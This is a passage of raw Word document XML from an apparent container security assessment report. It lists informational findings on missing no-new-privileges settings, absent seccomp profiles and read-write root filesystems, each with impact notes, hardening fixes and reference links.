          <w:p w14:paraId="2366AC07" w14:textId="77777777" w:rsidR="00B25578" w:rsidRPr="00243553" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>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gui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00243553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-official</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34E254F9" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>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sidRPr="00243553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>rcl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00243553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-official</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="6D8577A7" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34181B64" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BDFA339" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Possible privilege escalation using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>setuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> binaries , </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> and  other vulnerable components.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="6359F9F4" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="344C397B" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B45E83E" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Run docker container with --security-opt=no-new-privileges  option.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73EB7414" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2AD1104A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRPr="00B41807" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B41807">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reference:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="316AA573" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://docs.datadoghq.com/security_platform/default_rules/cis-docker-1.2.0-5.25/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DD6E2EE" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B25578">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId48" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194317">
        <w:bookmarkStart w:id="36" w:name="_Toc199711443"/>
        <w:bookmarkStart w:id="37" w:name="_Toc200562845"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>194317: Missing Seccomp profile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="C1BABA"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Informational)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>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2928B392" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07CC7D69" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AF3DA6B" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Seccomp (secure computing mode) is used to restrict the set of system calls applications can make, allowing cluster administrators greater control over the security of workloads. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="080F1A55" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">It was observed that seccomp profile was not set inside containers or disabled. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4671F217" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C613393" w14:textId="77777777" w:rsidR="00B25578" w:rsidRPr="00A21361" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21361">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reference:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5804525C" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://blog.aquasec.com/new-docker-security-features-and-what-they-mean-seccomp-profiles</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38D889F6" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6631637A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Below is the related screenshot: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FC2399B" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="distribute"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C9CFCAF" wp14:editId="36B04A44">
                  <wp:extent cx="5930660" cy="477078"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="15" name="Drawing 15" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 15" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId49"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5979659" cy="481020"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="5D969EF2" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="197DADBA" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Affected Container/Pod(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="057E6934" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00243553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>utilityBareMetal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00243553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00243553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-official</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="25A360A0" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="765C8673" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="569ED021" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Ignoring seccomp would allow an attacker to make system calls that might compromise the security of the containers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="300AA442" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07BE9D6A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A9A355" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Seccomp support is achieved via two annotations in the pod configuration:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24EBB3B8" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="015A6A65" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> - seccomp.security.alpha.kubernetes.io/pod: profile applies to all containers in the pod that do not override</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04B06249" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> - container.seccomp.security.alpha.kubernetes.io/&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>container_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;: container-specific profile override </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DB749D5" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7B98685E" w14:textId="77777777" w:rsidR="00B25578" w:rsidRPr="00407DA1" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00407DA1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Reference: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20E8E5FF" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://access.redhat.com/documentation/en-us/openshift_container_platform/3.9/html/cluster_administration/admin-guide-seccomp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21CC2741" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://itnext.io/hardening-docker-and-kubernetes-with-seccomp-a88b1b4e2111</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="234C41EF" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B25578">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId50" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194313">
        <w:bookmarkStart w:id="38" w:name="_Toc199711444"/>
        <w:bookmarkStart w:id="39" w:name="_Toc200562846"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>194313: Container's Root Filesystem Has Read-Write Permission</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="C1BABA"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Informational)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>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404DC25F" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F8A2C04" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32C76627" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>It was observed that containers root filesystem has R/W permissions. This increases attack surface since the root filesystem can be tampered.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26A6B1B3" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63FBD719" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>As a best practice, it is advised to mount containers filesystem as read-only.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71F70EAE" w14:textId="77777777" w:rsidR="00F96D7F" w:rsidRDefault="00F96D7F" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F77C754" w14:textId="73A09167" w:rsidR="00B25578" w:rsidRPr="00F96D7F" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F96D7F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reference:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4126B4E9" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://docs.datadoghq.com/security_platform/default_rules/cis-docker-1.2.0-5.12/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F72EDB" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>http://www.projectatomic.io/blog/2015/12/making-docker-images-write-only-in-production/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19CD43BB" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="72AC0AF0" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Below is the related screenshot: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D2C8742" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="088ADEF2" wp14:editId="2C1A8885">
                  <wp:extent cx="5927840" cy="461176"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="16" name="Drawing 16" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 16" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId51"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6045468" cy="470327"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
